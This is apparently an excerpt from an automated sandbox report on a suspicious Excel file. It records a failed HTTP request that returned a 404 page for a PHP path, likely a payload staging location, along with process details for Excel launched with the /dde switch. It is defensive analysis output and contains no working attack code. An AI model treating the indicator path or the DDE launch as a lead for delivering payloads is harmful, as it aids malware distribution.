Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 63 65 6e 74 65 72 2f 66 69 6c 65 73 2f 62 6f 61 64 2f 34 2f 6d 61 6e 61 67 65 72 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admincenter/files/boad/4/manager.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>



System Behavior

General

Start time: 19:03:26
Start date: 03/02/2018
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
Imagebase: 0x2fb40000
File size: 20392608 bytes
MD5 hash: 716335EDBB91DA84FC102425BFDA957E
Programmed in: C, C++ or other language
Reputation: moderate
